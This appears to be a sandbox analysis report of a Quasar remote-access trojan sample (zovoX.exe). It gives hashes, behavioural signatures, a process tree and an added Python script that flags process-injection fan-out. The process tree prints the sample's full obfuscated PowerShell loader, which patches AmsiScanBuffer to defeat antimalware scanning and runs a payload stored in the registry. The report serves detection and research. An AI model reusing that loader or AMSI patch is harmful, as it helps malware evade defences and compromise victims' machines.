Analysis
max time kernel: 149s
max time network: 102s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 24-12-2024 17:00
Static task: static1
Behavioral task: behavioral1, Sample: Compiled/BStub_Onimai.exe, Resource: win11-20241007-en
Behavioral task: behavioral2, Sample: Compiled/Stager.exe, Resource: win11-20241007-en
Behavioral task: behavioral3, Sample: Compiled/Ton618.exe, Resource: win11-20241007-en
General
Target: Compiled/zovoX.exe
Size: 2.9MB
MD5: 1976cb5215470bbbfe6ea766aa2b9253
SHA1: a9c899dbc512a5e8356731d4b1804fcbe4f6101b
SHA256: dbcc095aa748c9400b3a81781f44dab6cdead04f9abbc5612a49f156c2df3aff
SHA512: d6a904f2b0526435179d6d21b2d4021023451dbce44be4308cc83a6fd9d416be74fac0e4f1734005dc53d466b4dc734086ef97d59a2b6783a6d1f66f646be4b3
SSDEEP: 49152:XrCFFGZ0Ta3c4cF5v+kvvlEY4GO5me+90HPjxVBTvI5C8yXHxoAubGS:bC/la3cZ5v+st3OnxHPjRJ1ObT
Malware Config
Extracted: quasar
encryption_key: 6DC75341715F183F008C5D5A26E1967745A885D9
reconnect_delay: 3000
Signatures
Quasar family
Quasar payload 1 IoCs
  resource: behavioral4/memory/2368-23-0x000000001C360000-0x000000001C9AE000-memory.dmp, yara_rule: family_quasar
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  PID 4964 created 648 (pid 4964, Process powershell.EXE, procid_target 5)
Executes dropped EXE 1 IoCs
  pid 2368, Process $nya-Loli.bat
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
  File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx (svchost.exe)
  File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx (svchost.exe)
  pid 2360, Process powershell.exe
  pid 4964, Process powershell.EXE
Drops file in System32 directory 4 IoCs
  File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
  File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (powershell.EXE)
  File opened for modification C:\Windows\System32\Tasks\$nya-Loli_ (svchost.exe)
  File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml (OfficeClickToRun.exe)
Suspicious use of SetThreadContext 2 IoCs
  PID 3564 set thread context of 4296 (pid 3564, Process powershell.exe, procid_target 86)
  PID 4964 set thread context of 1692 (pid 4964, Process powershell.EXE, procid_target 89)
Drops file in Windows directory 3 IoCs
  File opened for modification C:\Windows\$nya-onimai3 (zovoX.exe)
  File created C:\Windows\$nya-onimai3\$nya-Loli.bat (zovoX.exe)
  File opened for modification C:\Windows\$nya-onimai3\$nya-Loli.bat (zovoX.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 (taskmgr.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
  Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar (Explorer.EXE)
  Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" (Explorer.EXE)
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 40 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  pid 3360, Process Explorer.EXE
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 25 IoCs
Suspicious use of SendNotifyMessage 64 IoCs
pid | Process
3360 | Explorer.EXE (63 entries)
2952 | taskmgr.exe (1 entry)
As with FindShellTrayWindow, these are shell and Task Manager window messages rather than sample activity.
-
Suspicious use of SetWindowsHookEx 3 IoCs
pid | Process
2368 | $nya-Loli.bat
1372 | MiniSearchHost.exe
3360 | Explorer.EXE
Of these only $nya-Loli.bat belongs to the sample; despite the .bat extension it is a dropped executable (see "Executes dropped EXE" on PID 2368 in the process tree), and a hook set from it is the one worth following up.
-
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (identical records collapsed; 64 records in total)
PID 2624 wrote to memory of 2360 | 2624 | zovoX.exe | 78 (2 records)
PID 2360 wrote to memory of 2368 | 2360 | powershell.exe | 80 (2 records)
PID 2368 wrote to memory of 2824 | 2368 | $nya-Loli.bat | 82 (2 records)
PID 2368 wrote to memory of 3564 | 2368 | $nya-Loli.bat | 84 (4 records)
PID 3564 wrote to memory of 4296 | 3564 | powershell.exe | 86 (9 records)
PID 4964 wrote to memory of 1692 | 4964 | powershell.EXE | 89 (8 records)
PID 1692 wrote to memory of <target> | 1692 | dllhost.exe | one record per target, procid_target in parentheses: 648 (5), 700 (7), 996 (12), 564 (13), 712 (14), 756 (15), 1076 (16), 1084 (17), 1220 (19), 1248 (20), 1296 (21), 1320 (22), 1408 (23), 1432 (24), 1476 (25), 1504 (26), 1532 (27), 1736 (28), 1760 (29), 1776 (30), 1868 (31), 1952 (32), 2004 (33), 2024 (34), 1836 (35), 2056 (36), 2120 (37), 2288 (39), 2396 (40), 2556 (41), 2564 (42), 2632 (43), 2648 (44), 2716 (45), 2724 (46), 2752 (47), 2764 (48) (37 records)
The first six rows are a parent writing into the child it has just created, which Start-Process and the SysWOW64 powershell.exe pair do legitimately as well as maliciously. The last row is different in kind: dllhost.exe 1692 is created by powershell.EXE 4964 under a parent other than 4964 (NtCreateUserProcessOtherParentProcess, which is why it sits under winlogon.exe in the process tree), receives eight writes from 4964 while SetThreadContext is also reported on 4964, and then writes once into every other process alive at that point: winlogon.exe, lsass.exe, dwm.exe, every service host including the Schedule (1248) and EventLog (1432) hosts, spoolsv.exe and the sandbox's own sysmon.exe (2724). That is a system-wide injection sweep, not a single-target hollowing.
-
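The WriteProcessMemory table is the clearest indicator in this report: one process, dllhost.exe (PID 1692), writes into 37 others, winlogon.exe (648), lsass.exe (700), the EventLog service host (1432) and sysmon.exe (2724) among them, right after powershell.EXE (4964) wrote into it eight times. The script below is an added example, not part of the report or of the sandbox's tooling: it parses records in the format the table uses and flags any writer with a wide fan-out or any write into a process that should never be a target. RECORDS is an excerpt copied from the table (13 of the 64 records) and IMAGES is the PID-to-image mapping taken from the process tree; the fan-out threshold and the sensitive-process list are assumptions chosen for illustration.

```python
"""Injection fan-out heuristic over sandbox WriteProcessMemory records.

Added example; not the sample's code and not the sandbox's. RECORDS is an
excerpt of the report's table, IMAGES is taken from its process tree, and
FANOUT_THRESHOLD / SENSITIVE are assumptions for illustration.
"""
import re
from collections import defaultdict

# Excerpt of the report's WriteProcessMemory records (13 of 64), copied from the table above.
RECORDS = """
PID 2624 wrote to memory of 2360 2624 zovoX.exe 78
PID 2360 wrote to memory of 2368 2360 powershell.exe 80
PID 2368 wrote to memory of 3564 2368 $nya-Loli.bat 84
PID 3564 wrote to memory of 4296 3564 powershell.exe 86
PID 3564 wrote to memory of 4296 3564 powershell.exe 86
PID 4964 wrote to memory of 1692 4964 powershell.EXE 89
PID 1692 wrote to memory of 648 1692 dllhost.exe 5
PID 1692 wrote to memory of 700 1692 dllhost.exe 7
PID 1692 wrote to memory of 996 1692 dllhost.exe 12
PID 1692 wrote to memory of 564 1692 dllhost.exe 13
PID 1692 wrote to memory of 1248 1692 dllhost.exe 20
PID 1692 wrote to memory of 1432 1692 dllhost.exe 24
PID 1692 wrote to memory of 2724 1692 dllhost.exe 46
"""

# PID -> image, taken from the report's process tree (only the PIDs used above).
IMAGES = {
    648: "winlogon.exe", 700: "lsass.exe", 564: "dwm.exe",
    996: "svchost.exe (LSM)", 1248: "svchost.exe (Schedule)",
    1432: "svchost.exe (EventLog)", 2724: "sysmon.exe",
    1692: "dllhost.exe", 2360: "powershell.exe", 2368: "$nya-Loli.bat",
    3564: "powershell.exe", 4296: "powershell.exe", 4964: "powershell.EXE",
}

# Assumptions: images we never expect to be written into, and the distinct-target
# count beyond which a single writer is reported.
SENSITIVE = {"winlogon.exe", "lsass.exe", "sysmon.exe"}
FANOUT_THRESHOLD = 5

# "PID <writer> wrote to memory of <target> <writer> <image> <procid_target>"
REC_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\d+)$")


def parse_records(text):
    """Return [(writer_pid, writer_image, target_pid), ...]; raise on a line that does not parse."""
    out = []
    for line in text.strip().splitlines():
        m = REC_RE.match(line)
        if not m:
            raise ValueError(f"unparsed record: {line!r}")
        out.append((int(m.group(1)), m.group(3), int(m.group(2))))
    return out


def fanout(records):
    """Map (writer_pid, writer_image) -> set of distinct target PIDs."""
    targets = defaultdict(set)
    for wpid, wimg, tpid in records:
        targets[(wpid, wimg)].add(tpid)
    return targets


def flag(records, threshold=FANOUT_THRESHOLD):
    """Findings: writers over the fan-out threshold, and any write into a SENSITIVE image."""
    findings = []
    for (wpid, wimg), tset in fanout(records).items():
        if len(tset) >= threshold:
            findings.append(f"{wimg}[{wpid}] wrote into {len(tset)} distinct processes")
        for tpid in sorted(tset):
            timg = IMAGES.get(tpid, "?")
            if timg in SENSITIVE:
                findings.append(f"{wimg}[{wpid}] wrote into {timg}[{tpid}]")
    return findings


if __name__ == "__main__":
    for finding in flag(parse_records(RECORDS)):
        print(finding)
```

Run against the excerpt it reports dllhost.exe[1692] once for fan-out and three times for its writes into winlogon.exe, lsass.exe and sysmon.exe, while the loader chain's parent-to-child writes stay silent; on the full 64-record table the fan-out count rises to 37. The threshold is deliberately low for a sandbox trace; on a production endpoint a per-image baseline replaces the constant.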
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times. In this run the Schedule service host (svchost.exe -k netsvcs -p -s Schedule, PID 1248, which also drops a file in the System32 directory) is the parent of the powershell.EXE stage (PID 4964), so that stage is launched as a scheduled task rather than directly by the sample; $nya-Loli.bat (PID 2368) additionally runs schtasks.exe /Delete /TN "$nya-Loli_1" /F to remove any earlier task of that name.
Processes
depth | image | command line | PID (entries are indented by depth; signature hits are listed under the entry they belong to)
1 | C:\Windows\system32\winlogon.exe | winlogon.exe | PID 648
  2 | C:\Windows\system32\dwm.exe | "dwm.exe" | PID 564
  2 | C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{3e56bfce-726c-4b8f-9283-d3263c96abd5} | PID 1692
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
1 | C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID 700
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID 996
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID 712
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID 756
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID 1076
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc | PID 1084
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | PID 1220
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID 1248
  - Drops file in System32 directory
  2 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BetvLqzIQfXU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mskZeRDtWnqfrJ,[Parameter(Position=1)][Type]$OLRhvfADOC)$kfzmXjndVHv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'Del'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+'e'+'T'+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+','+'A'+'u'+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kfzmXjndVHv.DefineConstructor('R'+[Char](84)+'Sp'+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mskZeRDtWnqfrJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$kfzmXjndVHv.DefineMethod(''+[Char](73)+'n'+[Char](118)+'ok'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+',H'+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+',Vi'+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OLRhvfADOC,$mskZeRDtWnqfrJ).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'g'+'e'+'d');Write-Output $kfzmXjndVHv.CreateType();}$ggzAZnEaJoIPE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'af'+[Char](101)+''+[Char](78)+''+'a'+'t'+'i'+''+[Char](118)+'e'+[Char](77)+''+'e'+''+'t'+''+'h'+'ods');$GyVKHHZojcLTwT=$ggzAZnEaJoIPE.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SbDpojLmJNvugFJbuSF=BetvLqzIQfXU @([String])([IntPtr]);$GwUtWipjhlmFTNAeeLWLqs=BetvLqzIQfXU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HzWcrLbXxKv=$ggzAZnEaJoIPE.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$eXhvaismJaGhXU=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$HzWcrLbXxKv,[Object](''+'L'+''+'o'+'a'+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$ckQmcQBqaYVDpyaSy=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$HzWcrLbXxKv,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'te'+[Char](99)+'t')));$CKKaiRc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eXhvaismJaGhXU,$SbDpojLmJNvugFJbuSF).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+[Char](108)+'l');$ShhVhueMyFfZChNuX=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$CKKaiRc,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+'r')));$ZZoOgnJxUP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ckQmcQBqaYVDpyaSy,$GwUtWipjhlmFTNAeeLWLqs).Invoke($ShhVhueMyFfZChNuX,[uint32]8,4,[ref]$ZZoOgnJxUP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ShhVhueMyFfZChNuX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ckQmcQBqaYVDpyaSy,$GwUtWipjhlmFTNAeeLWLqs).Invoke($ShhVhueMyFfZChNuX,[uint32]8,0x20,[ref]$ZZoOgnJxUP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TWA'+[Char](82)+''+[Char](69)+'').GetValue('$'+'n'+''+[Char](121)+''+'a'+''+[Char](45)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" | PID 4964
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm | PID 1296
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | PID 1320
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc | PID 1408
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | PID 1432
  - Indicator Removal: Clear Windows Event Logs
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | PID 1476
  2 | C:\Windows\system32\sihost.exe | sihost.exe | PID 2648
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | PID 1504
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | PID 1532
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | PID 1736
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | PID 1760
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p | PID 1776
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | PID 1868
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID 1952
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID 2004
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | PID 2024
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | PID 1836
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository | PID 2056
1 | C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID 2120
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | PID 2288
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc | PID 2396
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | PID 2556
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | PID 2564
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p | PID 2632
  - Modifies data under HKEY_USERS
  - Modifies registry class
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | PID 2716
1 | C:\Windows\sysmon.exe | C:\Windows\sysmon.exe | PID 2724
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | PID 2752
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | PID 2764
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | PID 2772
  - Suspicious use of AdjustPrivilegeToken
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | PID 2784
1 | C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding | PID 3108
1 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID 3360
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  2 | C:\Users\Admin\AppData\Local\Temp\Compiled\zovoX.exe | "C:\Users\Admin\AppData\Local\Temp\Compiled\zovoX.exe" | PID 2624
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    3 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process 'C:\Windows\$nya-onimai3\$nya-Loli.bat' | PID 2360
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      4 | C:\Windows\$nya-onimai3\$nya-Loli.bat | "C:\Windows\$nya-onimai3\$nya-Loli.bat" | PID 2368
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        5 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 2924
        5 | C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F | PID 2824
        5 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" | PID 3564
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          6 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" | PID 4296
            - System Location Discovery: System Language Discovery
  2 | C:\Windows\system32\taskmgr.exe | "C:\Windows\system32\taskmgr.exe" /0 | PID 2952
    - Checks SCSI registry key(s)
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc | PID 3516
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | PID 3548
1 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID 3936
  - Modifies registry class
1 | C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID 4016
1 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID 4052
  - Modifies registry class
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc | PID 4084
1 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} | PID 4328
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc | PID 4524
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | PID 2128
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc | PID 2384
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | PID 1768
  - Modifies data under HKEY_USERS
1 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service | PID 1052
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
1 | C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding | PID 1488
1 | C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager | PID 2972
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc | PID 1940
1 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID 2164
1 | C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc | PID 5060
1 | C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | PID 4680
1 | C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251} | PID 2444
1 | C:\Windows\system32\BackgroundTransferHost.exe | "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13 | PID 3064
  - Modifies registry class
1 | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca | PID 1372
  - Suspicious use of SetWindowsHookEx
1 | C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | PID 628
Network
MITRE ATT&CK Enterprise v15
Downloads
-
